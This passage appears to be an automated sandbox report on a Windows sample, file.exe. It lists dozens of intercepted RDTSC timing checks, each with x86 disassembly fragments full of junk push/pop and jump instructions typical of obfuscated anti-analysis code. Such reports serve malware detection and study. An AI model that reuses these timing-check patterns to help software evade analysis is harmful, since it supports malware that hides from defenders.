               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE41FD second address: CE4219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F055D0637BFh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE4219 second address: CE4224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F055C7C8326h 0x0000000a popad 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE4224 second address: CE422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB7FE second address: CEB804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB804 second address: CEB81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BCh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F055D0637B6h 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA441 second address: CEA47E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055C7C8333h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F055C7C832Eh 0x00000011 jnp 00007F055C7C8326h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007F055C7C833Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA47E second address: CEA482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA482 second address: CEA486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEAB49 second address: CEAB4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEAB4F second address: CEAB56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEAB56 second address: CEAB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F055D0637B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEACE9 second address: CEACEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB18A second address: CEB195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB319 second address: CEB34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F055C7C8337h 0x0000000a jmp 00007F055C7C8333h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB4D8 second address: CEB4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB4DE second address: CEB511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 jc 00007F055C7C833Ah 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F055C7C8332h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB511 second address: CEB517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB6A7 second address: CEB6B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF37A9 second address: CF37B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF38F7 second address: CF38FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF38FB second address: CF391D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 jmp 00007F055D0637BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF391D second address: CF392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055C7C8326h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3C15 second address: CF3C1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3C1F second address: CF3C26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3C26 second address: CF3C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F055D0637C9h 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF41B1 second address: CF41CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F055C7C8336h 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF41CF second address: CF41D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF45C4 second address: CF45C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF45C8 second address: CF45CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA26DE second address: CA26E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA26E4 second address: CA26EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA26EA second address: CA270C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F055C7C8326h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jg 00007F055C7C834Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA270C second address: CA2716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F055D0637B6h 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78208 second address: C7820F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7820F second address: C7821E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 jp 00007F055D0637B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7821E second address: C7823A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F055C7C8330h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7823A second address: C78247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055D0637B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3346 second address: CF3386 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F055C7C8335h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F055C7C8353h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F055C7C8335h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3386 second address: CF338C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76766 second address: C76770 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76770 second address: C76775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76775 second address: C7678C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C8331h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF910A second address: CF9122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9122 second address: CF9136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F055C7C832Ah 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5E83 second address: CC5E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5F88 second address: CC5F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055C7C832Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6459 second address: B0F97F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, 0618DC61h 0x00000011 push dword ptr [ebp+122D008Dh] 0x00000017 sub dl, 00000022h 0x0000001a mov edi, dword ptr [ebp+1244A7EAh] 0x00000020 call dword ptr [ebp+122D1C62h] 0x00000026 pushad 0x00000027 jmp 00007F055D0637C1h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov eax, ecx 0x00000031 mov dword ptr [ebp+122D1A5Bh], eax 0x00000037 popad 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D2C59h], eax 0x00000043 mov dword ptr [ebp+122D1A5Bh], eax 0x00000049 mov esi, 0000003Ch 0x0000004e jbe 00007F055D0637C3h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D2EEFh], eax 0x0000005e lodsw 0x00000060 jmp 00007F055D0637BBh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D2EEFh], esi 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jo 00007F055D0637BCh 0x00000079 mov dword ptr [ebp+122D1C80h], ecx 0x0000007f nop 0x00000080 jno 00007F055D0637C9h 0x00000086 push eax 0x00000087 push ecx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6778 second address: CC6785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6785 second address: CC6797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC358F second address: CC3595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC691E second address: CC6924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6924 second address: CC6928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6FEA second address: CC6FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC709D second address: CC7149 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F055C7C8336h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F055C7C8335h 0x00000012 jmp 00007F055C7C832Fh 0x00000017 nop 0x00000018 mov ecx, 0C251AA3h 0x0000001d or cl, FFFFFFF1h 0x00000020 lea eax, dword ptr [ebp+12489BD8h] 0x00000026 mov edi, dword ptr [ebp+122D2B89h] 0x0000002c adc edi, 145E16AFh 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F055C7C8338h 0x00000039 push eax 0x0000003a pushad 0x0000003b popad 0x0000003c pop eax 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F055C7C8328h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b cmc 0x0000005c mov ecx, dword ptr [ebp+124599E8h] 0x00000062 lea eax, dword ptr [ebp+12489B94h] 0x00000068 mov dl, al 0x0000006a push eax 0x0000006b jng 00007F055C7C8334h 0x00000071 push eax 0x00000072 push edx 0x00000073 jp 00007F055C7C8326h 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7149 second address: CA26DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D2AF1h] 0x0000000f call dword ptr [ebp+1244A4F8h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F055D0637CAh 0x0000001d jmp 00007F055D0637C4h 0x00000022 push edi 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop edi 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD6B7 second address: CFD6D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F055C7C832Bh 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD6D6 second address: CFD707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jp 00007F055D0637D1h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD85B second address: CFD895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 jo 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F055C7C8336h 0x00000015 jo 00007F055C7C8326h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDDB8 second address: CFDDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F055D0637BFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFDEFC second address: CFDF49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8336h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F055C7C8337h 0x0000000f jmp 00007F055C7C8339h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE094 second address: CFE09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE09A second address: CFE0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F055C7C8326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02822 second address: D0284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637BDh 0x00000009 jmp 00007F055D0637C7h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0284F second address: D02853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02853 second address: D02859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02859 second address: D02877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02877 second address: D0287B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0287B second address: D02896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F055C7C832Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02A0C second address: D02A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02D1B second address: D02D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02D26 second address: D02D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02E8C second address: D02E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0838E second address: D083A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jo 00007F055D0637B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D084EE second address: D08543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F055C7C8326h 0x0000000a popad 0x0000000b jg 00007F055C7C832Eh 0x00000011 jmp 00007F055C7C8336h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop ebx 0x0000001d push esi 0x0000001e jmp 00007F055C7C832Dh 0x00000023 jmp 00007F055C7C8330h 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08543 second address: D08557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08557 second address: D08563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F055C7C8326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E474 second address: D0E4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C9h 0x00000007 pushad 0x00000008 jmp 00007F055D0637C6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F055D0637C3h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jl 00007F055D0637B6h 0x00000024 pop edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E4CC second address: D0E4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F055C7C8326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E924 second address: D0E950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pushad 0x00000008 jns 00007F055D0637B6h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E950 second address: D0E956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA7D second address: D0EA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F055D0637C7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA9C second address: D0EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F055C7C8326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6B82 second address: CC6B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D38 second address: D12D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C8338h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D5B second address: D12D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D5F second address: D12D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D6F second address: D12D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
